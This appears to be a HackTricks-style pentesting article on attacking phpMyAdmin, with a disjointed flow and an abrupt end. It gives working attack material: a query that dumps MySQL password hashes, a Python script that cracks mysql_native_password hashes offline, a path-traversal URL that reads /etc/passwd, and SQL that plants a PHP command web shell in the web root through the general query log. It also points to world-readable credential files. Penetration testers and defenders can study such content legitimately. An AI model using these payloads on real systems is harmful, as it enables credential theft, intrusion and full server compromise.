phpMyAdmin HackTricks

phpMyAdmin is one of the most widely deployed MySQL/MariaDB administration tools. Convenient for database administrators, it is also a prime target for penetration testers: misconfigurations, default installations, weak credentials and outdated versions often turn it into the golden key that leads to remote code execution (RCE), privilege escalation and full server compromise.

This article follows the HackTricks methodology: practical, hands-on and scenario-driven. We will explore how to identify, exploit and leverage phpMyAdmin in a controlled, authorized environment.

Disclaimer: This content is for educational and authorized security testing only. Unauthorized access to computers is illegal.


-- MySQL 5.7+ and MariaDB keep the hash in authentication_string; older releases used the password column instead.
-- The plugin column tells you which hash scheme each account uses.
SELECT user, host, plugin, authentication_string FROM mysql.user;

Crack them offline with John or Hashcat. mysql_native_password hashes (a leading `*` followed by 40 hex characters, i.e. SHA1(SHA1(password))) are unsalted and fast to crack: use hashcat mode 300 (strip the leading `*`) or John's mysql-sha1 format. caching_sha2_password hashes (starting with `$A$`, the MySQL 8 default) are salted, iterated SHA-256, so they crack far more slowly; recent hashcat releases support them as mode 7401.
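The following script is an added example, not code from the original page: it takes rows of the shape returned by the query above (constructed sample data, including the well-known mysql_native_password hash of the string "password" and a placeholder `$A$` value), classifies each hash, emits the hashcat/John input lines, and runs a small offline dictionary attack against the mysql_native_password entries to show what the tools are doing under the hood.

```python
# Added example (not from the original page): triage mysql.user hashes,
# convert them for hashcat/John, and crack mysql_native_password entries
# offline. All rows and wordlists below are constructed for illustration.
import hashlib
from typing import Optional

# Constructed sample of what "SELECT user, plugin, authentication_string
# FROM mysql.user;" might return. The root hash is the well-known
# mysql_native_password hash of "password"; the $A$ value is a placeholder.
SAMPLE_ROWS = [
    ("root", "mysql_native_password", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("app", "caching_sha2_password", "$A$005$CONSTRUCTED_PLACEHOLDER"),
    ("backup", "mysql_native_password", ""),
]


def mysql_native_password(password: str) -> str:
    """mysql_native_password = '*' + uppercase hex of SHA1(SHA1(password)).
    Unsalted, so identical passwords give identical hashes across servers."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify(auth_string: str) -> str:
    """Name the hash scheme from its on-disk format."""
    if auth_string == "":
        return "empty"  # account with no password set
    if auth_string.startswith("*") and len(auth_string) == 41:
        return "mysql_native_password"
    if auth_string.startswith("$A$"):
        return "caching_sha2_password"  # salted, iterated SHA-256 (MySQL 8 default)
    return "unknown"


def hashcat_line(auth_string: str) -> str:
    """hashcat -m 300 expects the 40 hex characters without the leading '*'."""
    return auth_string[1:].lower()


def john_line(user: str, auth_string: str) -> str:
    """john --format=mysql-sha1 accepts user:*HASH lines as-is."""
    return f"{user}:{auth_string}"


def crack_native(auth_string: str, wordlist) -> Optional[str]:
    """Dictionary attack: recompute the hash for each candidate and compare."""
    target = auth_string.upper()
    for candidate in wordlist:
        if mysql_native_password(candidate) == target:
            return candidate
    return None


def triage(rows, wordlist):
    """Return {user: (scheme, recovered_password_or_None)} for every row.
    Empty hashes are reported as recovered with the empty password."""
    result = {}
    for user, _plugin, auth in rows:
        scheme = classify(auth)
        if scheme == "empty":
            cracked = ""
        elif scheme == "mysql_native_password":
            cracked = crack_native(auth, wordlist)
        else:
            cracked = None  # hand $A$ hashes to hashcat (mode 7401) instead
        result[user] = (scheme, cracked)
    return result


if __name__ == "__main__":
    wordlist = ["123456", "admin", "password", "letmein"]  # constructed
    for user, (scheme, pw) in triage(SAMPLE_ROWS, wordlist).items():
        print(f"{user:8} {scheme:24} recovered={pw!r}")
    for user, _plugin, auth in SAMPLE_ROWS:
        if classify(auth) == "mysql_native_password":
            print("hashcat:", hashcat_line(auth), " john:", john_line(user, auth))
```

The `triage` function separates the three cases a tester actually meets in `mysql.user`: empty strings (log in with no password), native hashes (crack locally or feed to hashcat/John) and `$A$` hashes (hand to a GPU cracker and expect it to be slow).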

Example:

http://example.com/phpmyadmin/libraries/tcpdf/tcpdf.php?tcpdf_import=../../../../etc/passwd

If secure_file_priv is set, SELECT ... INTO OUTFILE is restricted to that directory (and disabled entirely when the variable is NULL). It does not govern the general query log, so an account with SUPER (or SYSTEM_VARIABLES_ADMIN on MySQL 8) can point the log at a file inside the web root instead. Two conditions must hold: the mysqld process needs write permission on the target directory, and nothing else may confine it (on Ubuntu the default AppArmor profile limits mysqld to its data and log directories). Check SHOW VARIABLES LIKE 'secure_file_priv'; and SHOW GRANTS; first, and note the current value of general_log_file so you can restore it afterwards:

SET GLOBAL general_log = 'ON';                            -- needs SUPER / SYSTEM_VARIABLES_ADMIN
SET GLOBAL general_log_file = '/var/www/html/shell.php';  -- path must be writable by the mysqld process
SELECT '<?php system($_GET["cmd"]); ?>';                  -- the query text is written verbatim into the log file
SET GLOBAL general_log = 'OFF';                           -- stop logging; the surrounding log lines are plain text PHP simply echoes
-- Afterwards, set general_log_file back to the value you noted before touching it.

Check config.inc.php (often world-readable; on Debian/Ubuntu it lives at /etc/phpmyadmin/config.inc.php, with the database credentials in /etc/phpmyadmin/config-db.php):